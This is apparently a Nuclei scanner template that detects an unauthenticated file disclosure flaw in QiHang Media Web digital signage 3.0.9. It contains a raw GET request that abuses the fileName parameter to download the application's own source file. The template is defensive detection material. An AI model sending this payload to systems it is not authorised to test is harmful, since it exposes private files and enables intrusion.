id: qihang-media-lfi

info:
  name: QiHang Media Web (QH.aspx) Digital Signage 3.0.9 Arbitrary File Disclosure Vulnerability
  author: gy741
  severity: high
  description: The QiHang Media Web application suffers from an unauthenticated file disclosure vulnerability when input passed thru the filename parameter when using the download action or thru path parameter when using the getAll action is not properly verified before being used. This can be exploited to disclose contents of files and directories from local resources.
  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5581.php
  tags: qihang,lfi

requests:
  - raw:
      - |
        GET /QH.aspx?responderId=ResourceNewResponder&action=download&fileName=.%2fQH.aspx HTTP/1.1
        Host: {{Hostname}}
        Connection: close

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "filename=QH.aspx"
          - "application/zip"
        part: header
        condition: and

      - type: word
        regex:
          - "QH.aspx.cs"
          - "QiHang.Media.Web.QH"
        condition: and

      - type: status
        status:
          - 200
